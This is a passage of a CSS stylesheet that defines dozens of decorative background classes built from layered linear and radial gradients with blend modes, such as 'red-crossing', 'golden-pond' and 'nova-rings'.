background: linear-gradient(180deg, #F7D6FF 0%, #005686 100%), linear-gradient(180deg, #FFFFFF 0%, #060046 100%), linear-gradient(130deg, #00FFA3 0%, #1A003C 100%), linear-gradient(307deg, #FF0000 0%, #3300C6 100%), radial-gradient(50% 72% at 50% 50%, #004584 0%, #00FFB2 100%), radial-gradient(100% 140% at 100% 0%, #5ED500 0%, #2200AA 100%);
background-blend-mode: soft-light, overlay, difference, difference, color-burn, normal;	
}
.red-crossing{
background: linear-gradient(121.28deg, #A4006C 0%, #FFECA8 100%), linear-gradient(121.28deg, #69003F 0%, #FFF8F8 100%), linear-gradient(238.72deg, #00FFFF 0%, #0212A4 100%), radial-gradient(67.16% 100% at 50% 0%, #FF00B8 0%, #FFFFFF 100%), linear-gradient(140.54deg, #7000FF 0%, #001AFF 72.37%), linear-gradient(307.43deg, #FFE927 0%, #00114D 100%), radial-gradient(107% 142.8% at 15.71% 104.5%, #FFFFFF 0%, #A7AA00 100%), #FFFFFF;
background-blend-mode: overlay, difference, difference, overlay, difference, difference, difference, normal;
}
.romantic-sun{
background: linear-gradient(180deg, #FFB7B7 0%, #727272 100%), radial-gradient(60.91% 100% at 50% 0%, #FFD1D1 0%, #260000 100%), linear-gradient(238.72deg, #FFDDDD 0%, #720066 100%), linear-gradient(127.43deg, #00FFFF 0%, #FF4444 100%), radial-gradient(100.22% 100% at 70.57% 0%, #FF0000 0%, #00FFE0 100%), linear-gradient(127.43deg, #B7D500 0%, #3300FF 100%);
background-blend-mode: screen, overlay, hard-light, color-burn, color-dodge, normal;
}
.another-view{
background: linear-gradient(238.72deg, #FFB864 0%, #006C4C 100%), radial-gradient(100% 224.43% at 0% 0%, #FCC482 0%, #002E74 100%), linear-gradient(121.28deg, #FFD464 0%, #00553B 100%), linear-gradient(229.79deg, #7534FF 0%, #248900 94.19%), radial-gradient(56.26% 101.79% at 50% 0%, #8F00FF 0%, #493500 100%), linear-gradient(96.19deg, #500052 3.37%, #D5B300 96.63%);
background-blend-mode: overlay, screen, lighten, hard-light, screen, normal;
}
.bright-leaks{
background: linear-gradient(121.28deg, #0E5432 0%, #D6AD96 100%), linear-gradient(121.28deg, #FF0000 0%, #FFBABA 100%), linear-gradient(140.54deg, #7000FF 0%, #0015D1 72.37%), linear-gradient(307.43deg, #FFE927 0%, #00114D 100%), radial-gradient(107% 142.8% at 15.71% 104.5%, #FFFFFF 0%, #A7AA00 100%), #FFFFFF;
background-blend-mode: overlay, overlay, difference, difference, difference, normal;
}
.execute-pink{
background: linear-gradient(125deg, #FFFFFF 0%, #000000 100%), linear-gradient(200deg, #FFD9E8 0%, #FFD9E8 50%, #DE95BA calc(50% + 1px), #DE95BA 60%, #7F4A88 calc(60% + 1px), #7F4A88 75%, #4A266A calc(75% + 1px), #4A266A 100%), linear-gradient(113deg, #FFD9E8 0%, #FFD9E8 40%, #DE95BA calc(40% + 1px), #DE95BA 50%, #7F4A88 calc(50% + 1px), #7F4A88 70%, #4A266A calc(70% + 1px), #4A266A 100%);
background-blend-mode: overlay, overlay, normal;
}
.cute-baby{
background: linear-gradient(180deg, #FFB7B7 0%, #727272 100%), radial-gradient(60.91% 100% at 50% 0%, #FFD1D1 0%, #260000 100%), linear-gradient(127.43deg, #00FFFF 0%, #FFFFFF 100%), radial-gradient(100.22% 100% at 70.57% 0%, #FF0000 0%, #00FFE0 100%), linear-gradient(64.82deg, #DBFF00 0%, #3300FF 100%);
background-blend-mode: screen, overlay, color-burn, color-dodge, normal;
}
.holographic-painting{
background: radial-gradient(50% 123.47% at 50% 50%, #00FF94 0%, #FF00C7 100%), linear-gradient(121.28deg, #213100 0%, #FF0000 100%), linear-gradient(360deg, #0029FF 0%, #8FFF00 100%), linear-gradient(114.9deg, #00C6A2 0%, #6A45A8 100%), radial-gradient(100% 148.07% at 0% 0%, #FFFFFF 0%, #1DCD00 100%);
background-blend-mode: screen, color-dodge, overlay, difference, normal;
}
.blue-morals{
background: linear-gradient(114.95deg, rgba(235, 0, 255, 0.5) 0%, rgba(0, 71, 255, 0) 34.35%), linear-gradient(180deg, #004B5B 0%, #FFA7A7 100%), linear-gradient(244.35deg, #FFB26A 0%, #3676B1 50.58%, #00A3FF 100%), linear-gradient(244.35deg, #FFFFFF 0%, #004A74 49.48%, #FF0000 100%), radial-gradient(100% 233.99% at 0% 100%, #B70000 0%, #AD00FF 100%), linear-gradient(307.27deg, #1DAC92 0.37%, #2800C6 100%), radial-gradient(100% 140% at 100% 0%, #EAFF6B 0%, #006C7A 57.29%, #2200AA 100%);
background-blend-mode: hard-light, overlay, overlay, overlay, difference, difference, normal;
}

.dynamic-energy{
background: linear-gradient(rgb(0, 3, 70) 0%, rgba(255, 160, 0, 1) 100%), linear-gradient(60deg, rgb(0, 5, 34) 0%, rgb(0, 255, 229) 100%), radial-gradient(100% 165% at 100% 100%, rgb(255, 0, 168) 0%, rgb(0, 255, 120) 100%), radial-gradient(100% 150% at 0% 0%, rgb(255, 245, 0) 0%, rgb(81, 213, 0) 100%);
background-blend-mode: overlay, soft-light, difference, normal;
}
.modern-path{
background: linear-gradient(127.43deg, #00F0FF 0%, #A80028 100%), radial-gradient(107% 142.8% at 15.71% 104.5%, #F3D0FC 0%, #1700A4 100%), radial-gradient(111% 111% at 74.29% -11%, #A90000 0%, #00FFE0 100%), linear-gradient(127.43deg, #B7D500 0%, #2200AA 100%);
background-blend-mode: overlay, difference, difference, normal;
}
.blurry-vision{
background: linear-gradient(42.52deg, rgba(255, 77, 0, 0.5) 14.06%, rgba(0, 117, 255, 0.5) 96.79%), radial-gradient(82.5% 115.5% at 23.57% 109.25%, #C4FFFB 0%, #3300FF 100%), radial-gradient(70.71% 99% at 100% 39.75%, #D50D00 0%, #520027 100%), radial-gradient(80.18% 112.25% at 29.46% -2.5%, #00D5C8 0%, #2200AA 100%);
background-blend-mode: soft-light, difference, difference, normal;
}
.red-scratch{
background: linear-gradient(158.09deg, rgba(255, 255, 255, 0.5) 9.62%, rgba(86, 18, 79, 0.5) 81.19%), linear-gradient(127.43deg, #27F2FF 0%, #CB0031 100%), radial-gradient(107% 142.8% at 15.71% 104.5%, #F3D0FC 0%, #1700A4 100%), radial-gradient(100.22% 100% at 70.57% 0%, #FF0000 0%, #00FFE0 100%), linear-gradient(127.43deg, #0095D5 0%, #0E0048 100%);
background-blend-mode: overlay, difference, difference, exclusion, normal;
}
.purple-darkteal{
background: radial-gradient(111% 111% at 74.29% -11%, #A93300 0%, #005570 100%), linear-gradient(127.43deg, #00D5C8 0%, #2200AA 100%);
background-blend-mode: difference, normal;
}
.blue-bleed{
background: linear-gradient(219.46deg, #110036 27.63%, #170059 100%), linear-gradient(219.46deg, #FFFFFF 27.63%, #19004E 100%), radial-gradient(100% 246.94% at 100% 100%, #FFFFFF 0%, #000353 100%), linear-gradient(121.18deg, #1400FF 0.45%, #3A0000 100%), linear-gradient(337.69deg, #DC52FF 8.44%, #00BDBD 84.19%), linear-gradient(222.34deg, #FFFFFF 12.99%, #008171 87.21%), linear-gradient(150.76deg, #0015D5 15.35%, #000B6C 89.57%);
background-blend-mode: screen, overlay, overlay, difference, difference, difference, normal;
}
.faded-journey{
background: linear-gradient(238.72deg, #FFB864 0%, #006C4C 100%), radial-gradient(100% 224.43% at 0% 0%, #FFD19B 0%, #002E74 100%), linear-gradient(121.28deg, #FFD464 0%, #00553B 100%), linear-gradient(229.79deg, #7534FF 0%, #248900 94.19%), radial-gradient(56.26% 101.79% at 50% 0%, #8F00FF 0%, #493500 100%), linear-gradient(96.19deg, #500052 3.37%, #D5B300 96.63%);
background-blend-mode: overlay, difference, overlay, hard-light, difference, normal;
}
.distroted-flower{
background: linear-gradient(100deg, rgb(255, 255, 255) 10%, rgb(0, 6, 47) 100%), linear-gradient(120deg, rgb(255, 65, 65) 30%, rgb(0, 28, 100) 110%), radial-gradient(100% 220% at 100% 0%, rgb(128, 0, 255) 10%, rgb(255, 255, 255) 30%, rgb(0, 160, 255) 100%), linear-gradient(60deg, rgb(34, 0, 242) 0%, rgb(83, 0, 0) 100%), linear-gradient(190deg, rgb(185, 0, 255) 0%, rgb(0, 136, 123) 90%), linear-gradient(180deg, rgb(252, 0, 0) 0%, rgba(0, 50, 255, 1) 75%), linear-gradient(220deg, rgb(0, 255, 55) 0%, rgb(255, 223, 0) 60%), radial-gradient(80% 110% at 50% 0%, rgba(0, 5, 0, 1) 0%, rgb(0, 52, 187) 100%);
background-blend-mode: overlay, overlay, color-burn, screen, color-burn, difference, color-dodge, normal;
}
.soil-burst{
background: radial-gradient(100% 244.46% at 0% 0%, #CCFF00 0%, #FF027C 100%), radial-gradient(50% 122.23% at 50% 50%, #9AA4FF 0%, #306C00 100%), radial-gradient(100.45% 245.58% at 0% 0%, #000AFE 0%, #70FF00 100%), linear-gradient(127.43deg, #7B0007 0%, #8F73FF 100%);
background-blend-mode: lighten, color-dodge, difference, normal;	
}
.pipe-dream{
background: linear-gradient(238.72deg, #FFB864 0%, #006C4C 100%), radial-gradient(100% 224.43% at 0% 0%, #FCC482 0%, #002E74 100%), linear-gradient(121.28deg, #FFEAB6 0%, #00563C 100%), linear-gradient(229.79deg, #7534FF 0%, #248900 94.19%), radial-gradient(56.26% 101.79% at 50% 0%, #8F00FF 0%, #493500 100%), linear-gradient(65.05deg, #6F0072 0%, #FFD600 100%);
background-blend-mode: overlay, screen, color-burn, hard-light, screen, normal;	
}
.water-ripple{
background: linear-gradient(301.28deg, #FFFFFF 51.74%, #1B00C0 100%), linear-gradient(121.28deg, #003077 0%, #88DBFF 100%), radial-gradient(100% 188.01% at 76.14% 0%, #43DDFF 0%, #FF0000 100%), linear-gradient(0deg, #DB00FF 0%, #14FF00 100%), radial-gradient(59.2% 100% at 50% 100%, #D50000 0%, #00B2FF 100%), radial-gradient(100% 148.07% at 0% 0%, #D50000 0%, #00FFFF 100%);
background-blend-mode: multiply, overlay, overlay, overlay, difference, normal;
}
.urban-health{
background: linear-gradient(140.54deg, #608D00 0%, #D30000 72.37%), linear-gradient(360deg, #0029FF 0%, #8FFF00 100%), radial-gradient(100% 164.72% at 100% 100%, #6100FF 0%, #00FF57 100%), radial-gradient(100% 148.07% at 0% 0%, #FFF500 0%, #51D500 100%);
background-blend-mode: color-dodge, overlay, difference, normal;	
}
.colorful-utopia{
background: linear-gradient(121.28deg, #010012 0%, #00FF94 100%), linear-gradient(180deg, #00647A 0%, #FFFFFF 100%), linear-gradient(244.35deg, #FFB26A 0%, #C15151 50.58%, #00A3FF 100%), linear-gradient(244.35deg, #E03F3F 0%, #00114B 49.48%, #FF0000 100%), radial-gradient(100% 233.99% at 0% 100%, #FF0000 0%, #AD00FF 100%), linear-gradient(307.27deg, #096F5C 0.37%, #687EB5 50.19%, #8877CE 100%), radial-gradient(100% 140% at 100% 0%, #FF00C7 0%, #006C7A 49.48%, #FF9900 100%);
background-blend-mode: overlay, difference, overlay, overlay, difference, color-dodge, normal;	
}
.radial-ridge{
background: linear-gradient(121.28deg, #03002C 0%, #00FF94 100%), linear-gradient(180deg, #00647A 0%, #FFFFFF 100%), linear-gradient(244.35deg, #FF8282 0%, #E86B6B 50.58%, #001B29 100%), linear-gradient(244.35deg, #E03F3F 0%, #00114B 49.48%, #FF0000 100%), radial-gradient(100% 216.55% at 0% 0%, #2400FF 0%, #FF0000 44.27%, #610051 100%), linear-gradient(307.27deg, #096F5C 0.37%, #687EB5 50.19%, #8877CE 100%), radial-gradient(56.34% 100% at 36.02% 0%, #FF00C7 0%, #006C7A 38.54%, #FF9900 100%);
background-blend-mode: overlay, difference, overlay, overlay, difference, color-dodge, normal;
}
.harbor-explorer{
background: linear-gradient(126.95deg, #91A2CD 0%, #008716 51.69%, #FF9900 100%), linear-gradient(126.95deg, #FFFFFF 0%, #00273D 49.48%, #FF9900 100%), radial-gradient(100% 216.55% at 100% 100%, #A4BE00 0%, #6100FF 100%), linear-gradient(307.27deg, #1DAC92 0.37%, #2800C6 100%), radial-gradient(100% 140% at 100% 0%, #EAFF6B 0%, #006C7A 57.29%, #2200AA 100%);
background-blend-mode: overlay, overlay, difference, difference, normal;	
}
.dark-hope{
background: radial-gradient(92.72% 100% at 50% 0%, rgba(215, 215, 215, 0.5) 0%, rgba(0, 0, 0, 0.5) 100%), radial-gradient(92.72% 100% at 50% 0%, #FF0000 0%, #000000 100%), radial-gradient(109.21% 213.32% at 100% 0%, #000AFF 0%, #70FF00 100%), radial-gradient(109.21% 213.32% at 100% 0%, #FF4D00 0%, #00C2FF 100%), linear-gradient(127.43deg, #D50000 0%, #7856FF 100%);
background-blend-mode: overlay, difference, difference, difference, normal;
}
.dual-glitch{
background: linear-gradient(151.47deg, #0500FF 0.49%, rgba(1, 0, 26, 0) 32.86%), linear-gradient(238.72deg, #FFFFFF 0%, #1F001C 100%), radial-gradient(100% 143.09% at 100% 0%, #000000 0%, #FFC700 100%), radial-gradient(100% 143.09% at 100% 0%, #5200FF 0%, #00113D 100%), radial-gradient(59.5% 100% at 49.32% 0%, #FF8A00 0%, #001AFF 100%), linear-gradient(121.28deg, #DBFF00 0%, #3300FF 100%), linear-gradient(121.28deg, #FF8A00 0%, #001AFF 100%), linear-gradient(180deg, #33FF00 0%, #FF0000 100%), radial-gradient(70.71% 99% at 100% 39.75%, #8000FF 0%, #FF0000 100%), radial-gradient(70.41% 100% at 50% 0%, #D5B300 0%, #00AA96 100%);
background-blend-mode: luminosity, soft-light, color-dodge, overlay, overlay, difference, difference, exclusion, difference, normal;
}
.ethical-destiny{
background: linear-gradient(121.28deg, #000000 0%, #FFFFFF 100%), linear-gradient(121.28deg, #FFB800 0%, #FFFFFF 100%), linear-gradient(140.54deg, #7000FF 0%, #001AFF 72.37%), linear-gradient(307.43deg, #FFE927 0%, #00114D 100%), radial-gradient(107% 142.8% at 15.71% 104.5%, #FFFFFF 0%, #A7AA00 100%), radial-gradient(100.22% 100% at 70.57% 0%, #7A3B00 0%, #1DAC92 100%);
background-blend-mode: difference, soft-light, difference, difference, difference, exclusion;
}
.twisted-fire{
background: linear-gradient(114.95deg, #3A003C 0%, rgba(0, 71, 255, 0) 53.31%), linear-gradient(180deg, #00647A 0%, #FFA7A7 100%), linear-gradient(244.35deg, #FFB26A 0%, #C15151 50.58%, #00A3FF 100%), linear-gradient(244.35deg, #E03F3F 0%, #001665 49.48%, #FF0000 100%), radial-gradient(100% 233.99% at 0% 100%, #FF0000 0%, #AD00FF 100%), linear-gradient(307.27deg, #096F5C 0.37%, #687EB5 50.19%, #8877CE 100%), radial-gradient(100% 140% at 100% 0%, #FF00C7 0%, #006C7A 49.48%, #760000 100%);
background-blend-mode: overlay, overlay, overlay, overlay, difference, color-dodge, normal;	
}
.golden-pond{
background: radial-gradient(ellipse farthest-corner at right bottom, #FEDB37 0%, #FDB931 8%, #9f7928 30%, #8A6E2F 40%, transparent 80%),radial-gradient(ellipse farthest-corner at left top, #FFFFFF 0%, #FFFFAC 8%, #D1B464 25%, #5d4a1f 62.5%, #5d4a1f 100%);	
}
.bluish-star{
background: linear-gradient(calc(126deg), rgba(163, 163, 163, 0.09) 0%, rgba(163, 163, 163, 0.09) 33.3%, rgba(100, 100, 100, 0.09) 33.3%, rgba(100, 100, 100, 0.09) 66.6%, rgba(162, 162, 162, 0.09) 66.6%, rgba(162, 162, 162, 0.09) 99%), linear-gradient(calc(332deg), rgba(193, 193, 193, 0.06) 0%, rgba(193, 193, 193, 0.06) 33.3%, rgba(169, 169, 169, 0.06) 33.3%, rgba(169, 169, 169, 0.06) 66.6%, rgba(92, 92, 92, 0.06) 66.6%, rgba(92, 92, 92, 0.06) 99%), linear-gradient(calc(203deg), rgba(45, 45, 45, 0.03) 0%, rgba(45, 45, 45, 0.03) 33.3%, rgba(223, 223, 223, 0.03) 33.3%, rgba(223, 223, 223, 0.03) 66.6%, rgba(173, 173, 173, 0.03) 66.6%, rgba(173, 173, 173, 0.03) 99%), linear-gradient(calc(354deg), rgba(226, 226, 226, 0.06) 0%, rgba(226, 226, 226, 0.06) 33.3%, rgba(81, 81, 81, 0.06) 33.3%, rgba(81, 81, 81, 0.06) 66.6%, rgba(186, 186, 186, 0.06) 66.6%, rgba(186, 186, 186, 0.06) 99%), linear-gradient(calc(159deg), rgba(225, 225, 225, 0.04) 0%, rgba(225, 225, 225, 0.04) 33.3%, rgba(95, 95, 95, 0.04) 33.3%, rgba(95, 95, 95, 0.04) 66.6%, rgba(39, 39, 39, 0.04) 66.6%, rgba(39, 39, 39, 0.04) 99%), linear-gradient(calc(202deg), rgba(184, 184, 184, 0.06) 0%, rgba(184, 184, 184, 0.06) 33.3%, rgba(0, 0, 0, 0.06) 33.3%, rgba(0, 0, 0, 0.06) 66.6%, rgba(140, 140, 140, 0.06) 66.6%, rgba(140, 140, 140, 0.06) 99.9%), linear-gradient(calc(397deg), rgba(40, 40, 40, 0.07) 0%, rgba(40, 40, 40, 0.07) 33.3%, rgba(214, 214, 214, 0.07) 33.3%, rgba(214, 214, 214, 0.07) 66.6%, rgba(190, 190, 190, 0.07) 66.6%, rgba(190, 190, 190, 0.07) 99.9%), linear-gradient(calc(135deg), rgba(230, 230, 230, 0) 0%, rgba(230, 230, 230, 0) 33.3%, rgba(241, 241, 241, 0) 33.3%, rgba(241, 241, 241, 0) 66.6%, rgba(55, 55, 55, 0) 66.6%, rgba(55, 55, 55, 0) 99%), linear-gradient(calc(74deg), rgb(186, 38, 227), rgb(15, 11, 239)), radial-gradient(100% 140% at 100% 0%, rgba(0,0,0,0.7) 0%, transparent 50%, rgba(0,0,0,0.7) 100%);
}
.redish-star{
background:linear-gradient(calc(120deg), rgba(163, 163, 163, 0.09) 0%, rgba(163, 163, 163, 0.09) 33.3%, rgba(100, 100, 100, 0.09) 33.3%, rgba(100, 100, 100, 0.09) 66.6%, rgba(162, 162, 162, 0.09) 66.6%, rgba(162, 162, 162, 0.09) 99%), linear-gradient(calc(326deg), rgba(193, 193, 193, 0.06) 0%, rgba(193, 193, 193, 0.06) 33.3%, rgba(169, 169, 169, 0.06) 33.3%, rgba(169, 169, 169, 0.06) 66.6%, rgba(92, 92, 92, 0.06) 66.6%, rgba(92, 92, 92, 0.06) 99%), linear-gradient(calc(197deg), rgba(45, 45, 45, 0.03) 0%, rgba(45, 45, 45, 0.03) 33.3%, rgba(223, 223, 223, 0.03) 33.3%, rgba(223, 223, 223, 0.03) 66.6%, rgba(173, 173, 173, 0.03) 66.6%, rgba(173, 173, 173, 0.03) 99%), linear-gradient(calc(348deg), rgba(226, 226, 226, 0.06) 0%, rgba(226, 226, 226, 0.06) 33.3%, rgba(81, 81, 81, 0.06) 33.3%, rgba(81, 81, 81, 0.06) 66.6%, rgba(186, 186, 186, 0.06) 66.6%, rgba(186, 186, 186, 0.06) 99%), linear-gradient(calc(153deg), rgba(225, 225, 225, 0.04) 0%, rgba(225, 225, 225, 0.04) 33.3%, rgba(95, 95, 95, 0.04) 33.3%, rgba(95, 95, 95, 0.04) 66.6%, rgba(39, 39, 39, 0.04) 66.6%, rgba(39, 39, 39, 0.04) 99%), linear-gradient(calc(196deg), rgba(184, 184, 184, 0.06) 0%, rgba(184, 184, 184, 0.06) 33.3%, rgba(0, 0, 0, 0.06) 33.3%, rgba(0, 0, 0, 0.06) 66.6%, rgba(140, 140, 140, 0.06) 66.6%, rgba(140, 140, 140, 0.06) 99.9%), linear-gradient(calc(391deg), rgba(40, 40, 40, 0.07) 0%, rgba(40, 40, 40, 0.07) 33.3%, rgba(214, 214, 214, 0.07) 33.3%, rgba(214, 214, 214, 0.07) 66.6%, rgba(190, 190, 190, 0.07) 66.6%, rgba(190, 190, 190, 0.07) 99.9%), linear-gradient(calc(129deg), rgba(230, 230, 230, 0) 0%, rgba(230, 230, 230, 0) 33.3%, rgba(241, 241, 241, 0) 33.3%, rgba(241, 241, 241, 0) 66.6%, rgba(55, 55, 55, 0) 66.6%, rgba(55, 55, 55, 0) 99%), linear-gradient(calc(68deg), rgb(227, 123, 38), rgb(239, 11, 83)), radial-gradient(100% 140% at 100% 0%, rgba(0,0,0,0.7) 0%, transparent 50%, rgba(0,0,0,0.7) 100%);
}
.greenish-star{
background:linear-gradient(calc(120deg), rgba(163, 163, 163, 0.09) 0%, rgba(163, 163, 163, 0.09) 33.3%, rgba(100, 100, 100, 0.09) 33.3%, rgba(100, 100, 100, 0.09) 66.6%, rgba(162, 162, 162, 0.09) 66.6%, rgba(162, 162, 162, 0.09) 99%), linear-gradient(calc(326deg), rgba(193, 193, 193, 0.06) 0%, rgba(193, 193, 193, 0.06) 33.3%, rgba(169, 169, 169, 0.06) 33.3%, rgba(169, 169, 169, 0.06) 66.6%, rgba(92, 92, 92, 0.06) 66.6%, rgba(92, 92, 92, 0.06) 99%), linear-gradient(calc(197deg), rgba(45, 45, 45, 0.03) 0%, rgba(45, 45, 45, 0.03) 33.3%, rgba(223, 223, 223, 0.03) 33.3%, rgba(223, 223, 223, 0.03) 66.6%, rgba(173, 173, 173, 0.03) 66.6%, rgba(173, 173, 173, 0.03) 99%), linear-gradient(calc(348deg), rgba(226, 226, 226, 0.06) 0%, rgba(226, 226, 226, 0.06) 33.3%, rgba(81, 81, 81, 0.06) 33.3%, rgba(81, 81, 81, 0.06) 66.6%, rgba(186, 186, 186, 0.06) 66.6%, rgba(186, 186, 186, 0.06) 99%), linear-gradient(calc(153deg), rgba(225, 225, 225, 0.04) 0%, rgba(225, 225, 225, 0.04) 33.3%, rgba(95, 95, 95, 0.04) 33.3%, rgba(95, 95, 95, 0.04) 66.6%, rgba(39, 39, 39, 0.04) 66.6%, rgba(39, 39, 39, 0.04) 99%), linear-gradient(calc(196deg), rgba(184, 184, 184, 0.06) 0%, rgba(184, 184, 184, 0.06) 33.3%, rgba(0, 0, 0, 0.06) 33.3%, rgba(0, 0, 0, 0.06) 66.6%, rgba(140, 140, 140, 0.06) 66.6%, rgba(140, 140, 140, 0.06) 99.9%), linear-gradient(calc(391deg), rgba(40, 40, 40, 0.07) 0%, rgba(40, 40, 40, 0.07) 33.3%, rgba(214, 214, 214, 0.07) 33.3%, rgba(214, 214, 214, 0.07) 66.6%, rgba(190, 190, 190, 0.07) 66.6%, rgba(190, 190, 190, 0.07) 99.9%), linear-gradient(calc(129deg), rgba(230, 230, 230, 0) 0%, rgba(230, 230, 230, 0) 33.3%, rgba(241, 241, 241, 0) 33.3%, rgba(241, 241, 241, 0) 66.6%, rgba(55, 55, 55, 0) 66.6%, rgba(55, 55, 55, 0) 99%), linear-gradient(calc(68deg), rgb(38, 227, 205), rgb(11, 239, 38)), radial-gradient(100% 140% at 100% 0%, rgba(0,0,0,0.7) 0%, transparent 50%, rgba(0,0,0,0.7) 100%);
}
.spectar {
background: linear-gradient(-45deg, #FFFF4F, #ee7752, #e73c7e, #23a6d5, #23d5ab, #70FF88);
}
.burst-spectrum{
background: linear-gradient(90deg, #5461c8 12.5%, #c724b1 25%, #e4002b 37.5%, #ff6900 50%, #f6be00 62.5%, #97d700 75%, #00ab84 87.5%, #00a3e0 100%);
}
.undefined-waves{
background: linear-gradient(301.28deg, #00C2FF 54.38%, rgba(0, 255, 224, 0) 100%), linear-gradient(129.96deg, #FF2F2F 10.43%, #000460 92.78%), radial-gradient(100% 246.94% at 100% 0%, #8000FF 0%, #BA75FF 54.17%, #FF0000 100%), linear-gradient(58.72deg, #2200F2 0%, #530000 100%), linear-gradient(154.03deg, #FF0000 0%, #00FF94 74.04%), linear-gradient(301.27deg, #FF0000 0%, #0038FF 84.63%), linear-gradient(136.23deg, #00C2FF 11.12%, #FF0000 86.47%), radial-gradient(57.37% 100% at 50% 0%, #B50000 0%, #0034BB 100%);
background-blend-mode: multiply, overlay, color-burn, screen, difference, difference, difference, normal;
}
.invisible-life{
background: radial-gradient(50% 123.47% at 50% 50%, #000000 0%, #FFFFFF 100%), radial-gradient(100% 100% at 50% 100%, #E9FFD8 0%, #001356 100%), linear-gradient(238.72deg, #0066FF 0%, #00CD21 100%), radial-gradient(100% 188.01% at 76.14% 0%, #00CAF7 0%, #FF00C7 100%), linear-gradient(0deg, #00C2FF 0%, #FFC700 100%), radial-gradient(59.2% 100% at 50% 0%, #8000FF 0%, #0085FF 100%), radial-gradient(100% 148.07% at 0% 0%, #FC8800 0%, #00FF94 100%);
background-blend-mode: overlay, multiply, hard-light, color-dodge, color-burn, color-burn, normal;
}
.leaf-rainbow{
background: radial-gradient(70.71% 99% at 100% 39.75%, #7700D5 0%, #000000 100%), radial-gradient(70.41% 100% at 50% 0%, #D5B300 0%, #2200AA 100%);
background-blend-mode: difference, normal;
}
.rainbow-burst{
background: linear-gradient(153.03deg, #0500FF 16.92%, #000000 87.01%), linear-gradient(121.28deg, #FFFFFF 70.31%, rgba(25, 0, 177, 0.85) 100%), linear-gradient(195.81deg, #FFB6B6 8.74%, #00492F 100%), linear-gradient(269.62deg, #FFFFFF 0.44%, #0077AA 99.56%), radial-gradient(77.85% 100% at 50% 0%, #6BFF71 0%, #190024 100%), linear-gradient(339.45deg, #00FF38 1.34%, #FF0000 73.07%), linear-gradient(201.13deg, #22F400 -0.47%, #DBFF00 100%), linear-gradient(94.04deg, #18007A 0%, #00D5C8 51.04%, #F4FF75 100%), #FFFFFF;
background-blend-mode: exclusion, multiply, overlay, multiply, color-dodge, difference, difference, normal, normal;
}
.gentle-space{
background-image: linear-gradient(to right top, #d16ba5, #c777b9, #ba83ca, #aa8fd8, #9a9ae1, #8aa7ec, #79b3f4, #69bff8, #52cffe, #41dfff, #46eefa, #5ffbf1);
}
.highlight-space{
background-image: linear-gradient(25deg, #d16ba5, #c974b9, #bc7ecc, #ab88dc, #9693e9, #7e93e4, #6792dd, #5191d4, #3d84ba, #2f76a1, #286887, #25596f), radial-gradient(85% 100% at 55% 25%, transparent 10%, rgba(255,175,170,.7) 100%);
background-blend-mode: multiply, multiply;
}
.abstract-leafs{
background: linear-gradient(235deg, #BABC4A 0%, #000000 100%), linear-gradient(235deg, #0026AC 0%, #282534 100%), linear-gradient(235deg, #00FFD1 0%, #000000 100%), radial-gradient(120% 185% at 25% -25%, #EEEEEE 0%, #EEEEEE 40%, #7971EA calc(40% + 1px), #7971EA 50%, #393E46 calc(50% + 1px), #393E46 70%, #222831 calc(70% + 1px), #222831 100%), radial-gradient(70% 140% at 90% 10%, #F5F5C6 0%, #F5F5C6 30%, #7DA87B calc(30% + 1px), #7DA87B 60%, #326765 calc(60% + 1px), #326765 80%, #27253D calc(80% + 1px), #27253D 100%);
background-blend-mode: overlay, lighten, overlay, color-burn, normal;
}

.light-divider{
background: linear-gradient(129.96deg, #FF2F2F 10.43%, #000460 92.78%), radial-gradient(100% 246.94% at 100% 0%, #FFFFFF 0%, #020063 100%), linear-gradient(121.18deg, #1400FF 0.45%, #3A0000 100%), linear-gradient(154.03deg, #FF002E 0%, #FF003D 74.04%), linear-gradient(341.1deg, #B25BBA 7.52%, #1700A7 77.98%), linear-gradient(222.34deg, #0047FF 12.99%, #FF0000 87.21%), linear-gradient(150.76deg, #B7D500 15.35%, #2200AA 89.57%);
background-blend-mode: overlay, color-burn, screen, overlay, difference, difference, normal;
}
.luminosity-rings{
background: linear-gradient(129.96deg, #FF2F2F 10.43%, #000460 92.78%), radial-gradient(70% 140% at 90% 10%, #F5F5C6 0%, #F5F5C6 30%, #7DA87B calc(30% + 1px), #7DA87B 60%, #326765 calc(60% + 1px), #326765 80%, #27253D calc(80% + 1px), #27253D 100%), radial-gradient(100% 246.94% at 100% 0%, #FFFFFF 0%, transparent 100%), linear-gradient(121.18deg, #1400FF 0.45%, #3A0000 100%), linear-gradient(154.03deg, #FF002E 0%, #FF003D 74.04%), linear-gradient(341.1deg, #B25BBA 7.52%, #1700A7 77.98%), linear-gradient(222.34deg, #0047FF 12.99%, transparent 87.21%), linear-gradient(150.76deg, #B7D500 15.35%, #2200AA 89.57%);
background-blend-mode: overlay, color-burn, screen, screen, saturation, difference, saturation, darken;
}
.nova-rings{
background: linear-gradient(129.96deg, #FF2F2F 10.43%, #000460 92.78%), radial-gradient(100% 246.94% at 100% 0%, #FFFFFF 0%, transparent 100%), linear-gradient(121.18deg, #1400FF 0.45%, #3A0000 100%), radial-gradient(70% 140% at 90% 10%, #F5F5C6 0%, #F5F5C6 30%, #7DA87B calc(30% + 1px), #7DA87B 60%, #326765 calc(60% + 1px), #326765 80%, #27253D calc(80% + 1px), #27253D 100%), linear-gradient(154.03deg, #FF002E 0%, #FF003D 74.04%), linear-gradient(341.1deg, #B25BBA 7.52%, #1700A7 77.98%), linear-gradient(222.34deg, #0047FF 12.99%, #FF0000 87.21%), linear-gradient(150.76deg, #B7D500 15.35%, #2200AA 89.57%);
background-blend-mode: overlay, color-burn, screen, overlay, saturation, difference, color, color;
}
.coming-light{
background: linear-gradient(129.96deg, #FF2F2F 10.43%, #000460 92.78%), radial-gradient(100% 246.94% at 100% 0%, #FFFFFF 0%, #020063 100%), linear-gradient(121.18deg, #1400FF 0.45%, #3A0000 100%), linear-gradient(154.03deg, #FF002E 0%, #FF003D 74.04%), linear-gradient(341.1deg, #B25BBA 7.52%, #1700A7 77.98%), linear-gradient(222.34deg, #0047FF 12.99%, #FF0000 87.21%), linear-gradient(150.76deg, #B7D500 15.35%, #2200AA 89.57%);
background-blend-mode: overlay, luminosity, screen, overlay, difference, difference, normal;
}
.orange-sparkle{
